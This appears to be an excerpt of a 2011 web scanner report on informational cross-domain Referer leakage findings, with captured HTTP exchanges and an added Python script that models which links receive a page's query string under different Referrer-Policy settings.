X-Px: ht lax-agg-n43.panthercdn.com
Cache-Control: max-age=315360000
Expires: Sun, 29 Aug 2021 20:36:07 GMT
Age: 188423
Content-Length: 640059
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Thu, 01 Sep 2011 20:33:47 GMT
Connection: keep-alive

/* :asset_packager_compatibility, 'config/asset_packages.yml' @ 1314908997 */
/* public/javascripts/prototype_uncompressed.js @ 1314908997 */

var Prototype={Version:'1.6.1',Browser:(function(){var ua
...[SNIP]...
<img src="/images/icons/fb_icon_15x15.gif" class="facebook_notice_icon">\
<a href="http://www.scribd.com/people/view/#{word_user_id}" class="menu_control">#{word_user_name}</a>
...[SNIP]...
<li><a href="http://www.scribd.com/">My Home</a>
...[SNIP]...
<li><a href="http://www.scribd.com/people/view/#{word_user_id}">View Public Profile</a>
...[SNIP]...
<li><a href="http://www.scribd.com/documents">My Documents</a>
...[SNIP]...
<li><a href="http://www.scribd.com/my_document_collections">My Collections</a>
...[SNIP]...
<li><a href="http://www.scribd.com/inbox">Messages</a>
...[SNIP]...
<li><a href="http://support.scribd.com">Help</a>
...[SNIP]...
<li><a href="http://www.scribd.com/logout">Log Out</a>
...[SNIP]...
</p><a href="http://www.scribd.com/facebookfaq" target="_blank">Learn More</a>
...[SNIP]...

18.23. http://static.lingospot.com/js/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.lingospot.com
Path:   /js/all.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (shown in the response excerpt below).

Request

GET /js/all.js?810 HTTP/1.1
Host: static.lingospot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LUI=bf037ed82ff04a1a

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "968558272"
Last-Modified: Wed, 30 Mar 2011 04:37:15 GMT
Vary: Accept-Encoding
Content-Length: 242634
Date: Sun, 04 Sep 2011 01:06:52 GMT
Server: lingo

LINGO.bubble_css = '.lingo_button{cursor:pointer;}.lingo_textfield_20,.lingo_textfield_25{}.lingo_textfield_middle{vertical-align:middle;}.lingo_textfield_ok .lingo_textfield_middle input{background:t
...[SNIP]...
(B7){var Bq=document.createElement("span");if(CG.params.height.charAt(CG.params.height.length-1)=="%"){Bq.style.display="block"}else{Bq.style.display="inline-block"}Bq.id="_lingo_container"+CI;var Bs="<a href='http://www.adobe.com/go/getflash/' target='_blank'><img src='"+brightcove.cdnURL+"/viewer/upgrade_flash_player2.gif' alt='Get Flash Player' width='314' height='200' border='0'>
...[SNIP]...
ems:function(){return T(this.page(),0,this.max_num_items)},_get_preview:function(Bd,Bb){var BZ=this.video_height;var Bc=this.video_width;var Ba=BW.exec(Bd.embed)[1];var Bf=BR.exec(Bd.embed)[1];var Be="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' codebase='http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0' width='"+Bc+"' height='"+BZ+"' id='csPlayer' align='middle'><param name='movie' value='http://eplayer.clipsyndicate.com/cs_api/get_swf' />
...[SNIP]...
<param name='flashvars' value='swfHome=eplayer.clipsyndicate.com&va_id="+Ba+"&wpid="+Bf+"' /><embed id='csPlayer' src='http://eplayer.clipsyndicate.com/cs_api/get_swf' width='"+Bc+"' height='"+BZ+"' allowfullscreen='true' allowscriptaccess='always' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer' flashvars='swfHome=eplayer.clipsyndicate.com&va_id="+Ba+"&wpid="+Bf+"' /></object>
...[SNIP]...

18.24. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (shown in the response excerpt below).

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.143.43
X-Cnection: close
Date: Sun, 04 Sep 2011 01:03:04 GMT
Content-Length: 8338

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/The-State-Worker/174087795950002" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41800_174087795950002_227248_q.jpg" alt="The State Worker" /></a>
...[SNIP]...
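
Findings 18.19 through 18.25 share one issue detail: the page URL carries a query string and the response links to other domains, so when the browser follows one of those links, or loads a cross-domain script or image, it sends the page URL, query string included, in the Referer header to the third party. The Python script below is an added example, not part of the scanner output or of any scanned site. It reproduces the scanner's condition against a constructed page URL and response body shaped like the 18.22 excerpt (hostnames under .example, a placeholder access_key value), and then models what a browser would actually put in Referer for each cross-domain link under a given Referrer-Policy and rel="noreferrer".

```python
"""Cross-domain Referer leakage check, modelled on the scanner's rule:
page URL has a query string AND the response links to other domains.

PAGE_URL, BODY and the policy names are constructed for this example;
the hosts are under .example and the access_key is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Element/attribute pairs that make the browser send a request carrying
# a Referer header (a navigation on click, or a subresource load).
LINK_ATTRS = {
    "a": "href", "link": "href", "form": "action",
    "script": "src", "img": "src", "iframe": "src",
}


class _LinkCollector(HTMLParser):
    """Collect (tag, url, rel) for every element listed in LINK_ATTRS."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        attr = LINK_ATTRS.get(tag)
        if attr and attrs.get(attr):
            self.links.append((tag, attrs[attr], (attrs.get("rel") or "").lower()))


def cross_domain_links(page_url, body):
    """Links in body whose host differs from the page's host (the scanner's condition)."""
    page_host = urlsplit(page_url).hostname
    collector = _LinkCollector()
    collector.feed(body)
    found = []
    for tag, url, rel in collector.links:
        parts = urlsplit(url)
        # Relative URLs resolve to the page's own host; javascript:, mailto:
        # and similar schemes carry no Referer, so only http(s) is considered.
        if parts.scheme in ("http", "https") and parts.hostname and parts.hostname != page_host:
            found.append((tag, url, rel))
    return found


def referer_sent(page_url, target_url, policy="no-referrer-when-downgrade", rel=""):
    """Simplified Referrer Policy model: the Referer value the browser sends
    for a request from page_url to target_url.  Returns None (no header),
    the page origin, or the full page URL minus fragment.  rel="noreferrer"
    on the link wins over any policy.  Per-element referrerpolicy attributes
    and <meta name=referrer> are not modelled."""
    src, dst = urlsplit(page_url), urlsplit(target_url)
    origin = f"{src.scheme}://{src.netloc}/"
    full = src._replace(fragment="").geturl()
    same_origin = (src.scheme, src.netloc) == (dst.scheme, dst.netloc)
    downgrade = src.scheme == "https" and dst.scheme == "http"

    if "noreferrer" in rel.split() or policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "origin":
        return origin
    if policy == "strict-origin":
        return None if downgrade else origin
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin
    if policy == "strict-origin-when-cross-origin":
        return full if same_origin else (None if downgrade else origin)
    raise ValueError(f"unknown Referrer-Policy {policy!r}")


def leaked_query_strings(page_url, body, policy="no-referrer-when-downgrade"):
    """(target_url, referer_value) for each cross-domain link that would
    receive the page's query string in the Referer header."""
    if not urlsplit(page_url).query:
        return []  # no query string: the scanner does not raise this issue
    leaks = []
    for _tag, url, rel in cross_domain_links(page_url, body):
        ref = referer_sent(page_url, url, policy, rel)
        if ref is not None and "?" in ref:
            leaks.append((url, ref))
    return leaks


# Constructed sample shaped like finding 18.22: an embed URL whose query
# string carries an access key, and a body linking to a CDN and a partner.
PAGE_URL = ("http://www.publisher.example/embeds/63688924/content"
            "?start_page=1&access_key=key-EXAMPLE0000")
BODY = """
<script src="http://cdn.publisher-assets.example/aggregated/javascript/base.js"></script>
<a href="http://www.publisher.example/inbox">Messages</a>
<a href="/people/view/123">View Public Profile</a>
<a href="http://support.publisher-help.example/">Help</a>
<a href="https://partner.example/faq" target="_blank" rel="noreferrer">Learn More</a>
"""

if __name__ == "__main__":
    for tag, url, rel in cross_domain_links(PAGE_URL, BODY):
        print(f"cross-domain <{tag}> {url} rel={rel!r}")
    for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin"):
        leaks = leaked_query_strings(PAGE_URL, BODY, policy)
        print(f"{policy}: {len(leaks)} link(s) receive the query string")
        for url, ref in leaks:
            print(f"  {url}\n    Referer: {ref}")
```

The default policy argument matches the browser behaviour this report was produced under (no-referrer-when-downgrade: the full URL is sent unless the request goes from HTTPS to HTTP), so with the sample body the CDN script and the help link both receive the access_key, and only the rel="noreferrer" link does not. Current browsers default to strict-origin-when-cross-origin, which sends only the origin on cross-origin requests; a site that still wants the scanner-era behaviour has to opt in with an explicit unsafe-url or no-referrer-when-downgrade header, and that opt-in is what to look for when triaging this finding today. Keeping secrets out of the query string in the first place removes the issue regardless of policy.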

18.25. http://www.personalcreations.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (shown in the response excerpt below).

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=t0fzx1lvvnjfpvihrdt22xwk; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=t0fzx1lvvnjfpvihrdt22xwk; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-2,xta-1,trf-1,tpp-4,tbc-1,ntd-1,tvc-1,tmm-2,xtb-1,tnp-2,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:47:54 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-1,thp-2,txb-2,tks-2,tms-2,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:47:54 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=71; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:47:54 GMT; path=/
Set-Cookie: PCR_BrowserId=15a5afb5-0d9c-45c7-84a2-3460492ea8f1; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:47:58 GMT
Content-Length: 167275


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<li id="proFlowerLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>


<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico"/>

<div id="Header">
...[SNIP]...
ersonal Creations Homepage" href="http://www.personalcreations.com/sitemap.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:78px;width:212px;"><img height="78px" width="212px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Personal Creations Homepage" border="0" /></a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=PCR">Your Account</a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=PCR">Order Tracking</a>
...[SNIP]...
_ctl9__ctl8_lkCart" class="SecondaryColor HeaderLink" href="http://gifts.personalcreations.com/ShoppingCart.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme"><img style="border:0 none;" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Shopping Cart" />&nbsp;&nbsp;shopping cart&nbsp;0</a>
...[SNIP]...
<div class="headerTextMsg"> <img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_FreePersTest_186x47_HeaderMsg.gif" border="0" /> </div>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<a href="javascript:O_LC();"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif" border="0" width="9" height="9" style="margin-top:-1px;vertical-align:middle;" title="site feedback" /></a>
       </div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
f="http://www.personalcreations.com/ProductSearch.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:21px;width:41px;display:inline;float:left;"><img class="sch_smallGo" height="21px" width="41px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
" href="http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero1" target="_self"><img id="_ctl10_DHero_rptSlides__ctl0_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_HAL11_SIT_04.jpg" alt="Shop Bestselling Halloween Gifts" border="0" /></a>
...[SNIP]...
" href="http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero2" target="_self"><img id="_ctl10_DHero_rptSlides__ctl1_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_CHR11_SIT_01.jpg" alt="Shop Bestselling Christmas Gifts" border="0" /></a>
...[SNIP]...
f="http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero3" target="_self"><img id="_ctl10_DHero_rptSlides__ctl2_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_B2S11_SIT_04.jpg" alt="Shop Bestselling Back to School Gifts" border="0" /></a>
...[SNIP]...
"0" href="http://www.personalcreations.com/personalized-wedding-gifts-PWEDBSL?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero4" target="_self"><img id="_ctl10_DHero_rptSlides__ctl3_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_WED11_SIT_03.jpg" alt="Shop Bestselling Wedding Gifts" border="0" /></a>
...[SNIP]...
border="0" href="http://www.personalcreations.com/clearance-sale-PCLEARA?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_topHeroPod" target="_self"><img id="_ctl10_TopPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_SAL11_SIT_02.gif" alt="Shop Our Clearance Sale" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
order="0" href="http://www.personalcreations.com/new-products-PNEWPRD?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_bottomHeroPod" target="_self"><img id="_ctl10_BottomPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_ALL11_SIT_02.jpg" alt="Shop New Gifts" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
